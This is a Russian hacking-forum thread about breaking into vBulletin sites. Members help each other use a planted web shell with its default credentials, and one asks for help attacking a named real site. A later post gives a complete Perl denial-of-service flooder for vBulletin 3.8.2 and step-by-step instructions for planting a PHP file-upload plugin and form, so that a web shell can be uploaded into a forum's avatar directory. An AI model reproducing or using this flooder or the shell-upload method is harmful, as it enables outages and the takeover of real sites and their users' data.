Взлом сайта с форумом vBulletin

Тема в разделе "Статьи", создана пользователем GettoLove, 20 фев 2008.

  1. Kernet
    Kernet Guest
    На _vBsupport.org почитай подпись у пользователя Keas
     
    20 окт 2008
  2. Хел
    Хел Guest
    Meltdown,
    пишет такого юзера нет =\ кидай сюда подпись
     
    Последнее редактирование модератором: 20 окт 2008
    20 окт 2008
  3. Kernet
    Kernet Guest
    20 окт 2008
  4. Хел
    Хел Guest
    Meltdown,
    вопервых он не кеас=\
    вовторых третья ссылка не пашет
    а в третьих мог бы сказать что ты говориш про хтакцесс=\\\ а в вшелле стандартный логин VShell и пароль тоже VShell
     
    20 окт 2008
  5. Kernet
    Kernet Guest
    Да про пасс я понял,в шелл вошел.
    Но шелл пишет config.php not editable.
     
    20 окт 2008
  6. Хел
    Хел Guest
    Meltdown,
    начит запись невозможна в файл, посмари права какие там, а точнее последние 3 символа в правах. и кинь сюда.
     
    20 окт 2008
  7. Kernet
    Kernet Guest
    Я чмод сменил на 777 было 664,но все также=/
     
    20 окт 2008
  8. Хел
    Хел Guest
    Meltdown,
    а те написало что чмод вос саксессфулл?
     
    20 окт 2008
  9. Kernet
    Kernet Guest
    нет,но права стали 777
     
    20 окт 2008
  10. Хел
    Хел Guest
    Meltdown,
    сервер лажит мб точнее настройка прав кривая
     
    20 окт 2008
  11. gameserver
    gameserver Новичок
    Симпатии:
    0
    :)) а что внизу никогда не смотришь движки форумов?
     
    3 ноя 2008
  12. Cor$air
    Cor$air Guest
    туда что угодно можно написать, не будь наивным...
     
    3 ноя 2008
  13. Macclaimer
    Macclaimer Новичок
    Симпатии:
    0
    GettoLove,
    привет!
    срочно нужна помощь по psu.com
    Ты писал, что он легко ломается, но прошло уже больше года, все могло измениться.
     
    29 окт 2009
  14. White-Power
    White-Power Guest
    vBulletin® Version 3.8.2 Denial of Service Exploit

    Код:
    #!usr/bin/perl
    #vBulletin® Version 3.8.2 Denial of Service Exploit
    #ea$y Laster
    ########################################################################
    # Modules                                                              #
    ########################################################################
    use IO::SOCKET;           # Object interface                           #
    ########################################################################
    if (@ARGV<1){
    print"
    ########################################################################
    ## _                     _     _                   _                  ##
    ##| |_ ___ ___ _____ ___|_|___| |_ ___ ___ ___ ___| |_                ##
    ##|  _| -_| .'|     |___| |   |  _| -_|  _|   | -_|  _|               ##
    ##|_| |___|__,|_|_|_|   |_|_|_|_| |___|_| |_|_|___|_|                 ##
    ##                                                                    ##
    ########################################################################
    ########################################################################
    ##                                ##                                  ##
    ##->vBulletin® Version 3.8.2<-    ##                                  ##
    ##                                ##                                  ##
    ##Gebe diese Daten an             ##                                  ##
    ##1.Ziel                          ##[*] www.Ziel.com                  ##
    ##2.Board                         ##[*] vbulletin                     ##
    ##3.Verwundbarkeit                ##[*] forumdisplay.php?f=           ##
    ##4.Zeit des vorganges            ##[*] 9999999999999999              ##
    ##5.Port                          ##[*] 80                            ##
    ########################################################################
    \a";}
    $block = "
    ########################################################################";
    $fehler = "Fehler!Fehler!Fehler!Fehler";
    $x =0;
         print"$block\n";
         print q(Ziel->);
         chomp($ziel =<STDIN>);
         if ($ziel eq""){
         die "$fehler\a\n";}
         print"$block\n";
           print"$block\n";
           print q(Path->);
           chomp($path =<STDIN>);
           if ($path eq "") {
           die "$fehler !\a\n";}
           print"$block\n";
              print"$block\n";
              print "Verwundbarkeit\n";
              print"forumdisplay.php?f=\n";
              print"->"n;
                chomp($vul =<STDIN>);
                if ($vul eq "") {
                die "$fehler !\a\n";}
                print"$block\n";
                   print"$block\n";
                   print q(Time->);
                   chomp($flood =<STDIN>);
                   if ($flood eq "") {
                   die "$fehler !\a\n";}
                      print"$block\n";
                      print"$block\n";
                      print q(Port->);
                      chomp($port =<STDIN>);
                      if ($port eq ""){
                      die "$fehler \n";}
                      print"$block\n";
                         print q(Send "start"->);
                         chomp($start =<STDIN>);
                         if ($start eq "") {
                         die "$fehler\n";}
    print "$block\a\n";
    print "[+]Konntroliere Daten \n";
    print "[*]Kontroliere Ziel   : $ziel\n";
    print "[*]Kontroliere Board  : $path\n";
    print "[*]Kontroliere Port   : $port\n";
    print "$block\n";
    if($start == 1){
    while($x != 0000){
    $x++;}
    }elsif ($start == start){
    while($x != $flood)
    {
    $postit = "$ziel"."$path"."$vul";
    $lrg = length $postit;
    $sock = new IO::Socket::INET (
                                   PeerAddr => "$ziel",
                                   PeerPort => "$port",
                                   Proto => "tcp",
                                  );
    
    print $sock "POST $path$vul HTTP/1.1\n";
    print $sock "Host: $ziel\n";
    print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";
    print $sock "Referer: $ziel\n";
    print $sock "Accept-Language: en-us\n";
    print $sock "Content-Type: application/x-www-form-urlencoded\n";
    print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20070421 Firefox/2.0.0\n";
    print $sock "Content-Length: $lrg\n\n";
    print $sock "$postit\n";
    close($sock);
    syswrite STDOUT, "->BLACKOUT<-";
    $x++;
    }
    }else{
    die "Fehler kann nicht zum Ziel verbinden $ziel !\n";
    }
    
    Заливаем шелл[любая версия]​

    Плагины и Продукты -> Добавить новый плагин -> Во вкладке "Plugin PHP Code" пишем:
    PHP:
    $target_path = "images/avatars"; //ваша директория, главное что бы чмод 777 стоял

    $target_path = $target_path . basename( $_FILES['uploadedfile']['name']);

    if(
    move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
        echo 
    "The file ".  basename( $_FILES['uploadedfile']['name']).
        
    " has been uploaded";
    } else{
        echo 
    "There was an error uploading the file";
    }
    Устанавливаем плагин как активный, сохраняемся, и видим ошибку "No input File Specified". Все нормально.

    Далее нам нужно место для загрузки:
    Код:
    <form enctype="multipart/form-data" action="ajax.php" method="POST">
    <input type="hidden" name="MAX_FILE_SIZE" value="100000" />
    Choose a file to upload: <input name="uploadedfile" type="file" /><br />
    <input type="hidden" name="s" value="$session[sessionhash]" />
    <input type="hidden" name="securitytoken" value="$bbuserinfo[securitytoken]" />
    <input type="submit" value="Upload File" />
    </form>
    
    Вставляем везде где разрешен хтмл, или редактируем шаблон и загружаем наш шелл
    ​
    Источник: whack.ru​
     
    30 ноя 2009
    1 человеку нравится это.
Загрузка...